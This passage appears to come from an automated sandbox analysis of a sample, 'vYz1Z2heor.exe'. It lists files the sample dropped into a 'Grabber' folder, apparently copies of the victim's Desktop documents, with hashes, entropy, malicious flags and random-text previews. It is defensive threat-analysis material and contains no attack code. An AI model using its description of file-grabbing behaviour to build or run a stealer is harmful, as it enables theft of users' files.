                                                            Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DUUDTUBZFW\KLIZUSIQEN.jpg

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.696703751818505
                                                            Encrypted:false
                                                            SSDEEP:24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
                                                            MD5:19255ED5D4F37A096C105CEF82D0F5C0
                                                            SHA1:96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
                                                            SHA-256:A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
                                                            SHA-512:CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
                                                            Malicious:true
                                                            Preview:KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DUUDTUBZFW\ZGGKNSUKOP.xlsx

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.6959554225029665
                                                            Encrypted:false
                                                            SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                            MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                            SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                            SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                            SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                            Malicious:true
                                                            Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EIVQSAOTAQ.png

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.692024230831571
                                                            Encrypted:false
                                                            SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                            MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                            SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                            SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                            SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                            Malicious:false
                                                            Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EOWRVPQCCS.pdf

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.692990330209164
                                                            Encrypted:false
                                                            SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                            MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                            SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                            SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                            SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                            Malicious:false
                                                            Preview:EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EWZCVGNOWT.pdf

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.690071120548773
                                                            Encrypted:false
                                                            SSDEEP:24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
                                                            MD5:8F49644C9029260CF4D4802C90BA5CED
                                                            SHA1:0A49DD925EF88BDEA0737A4151625525E247D315
                                                            SHA-256:C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
                                                            SHA-512:CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
                                                            Malicious:false
                                                            Preview:EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\JDDHMPCDUJ.png

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.687055908915499
                                                            Encrypted:false
                                                            SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                            MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                            SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                            SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                            SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                            Malicious:false
                                                            Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KLIZUSIQEN.jpg

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.696703751818505
                                                            Encrypted:false
                                                            SSDEEP:24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
                                                            MD5:19255ED5D4F37A096C105CEF82D0F5C0
                                                            SHA1:96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
                                                            SHA-256:A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
                                                            SHA-512:CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
                                                            Malicious:true
                                                            Preview:KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH.docx

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.696508269038202
                                                            Encrypted:false
                                                            SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                            MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                            SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                            SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                            SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                            Malicious:true
                                                            Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\DUUDTUBZFW.xlsx

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.701195573484743
                                                            Encrypted:false
                                                            SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                            MD5:2530C45A92F347020337052A8A7D7B00
                                                            SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                            SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                            SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                            Malicious:false
                                                            Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\EIVQSAOTAQ.png

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.692024230831571
                                                            Encrypted:false
                                                            SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                            MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                            SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
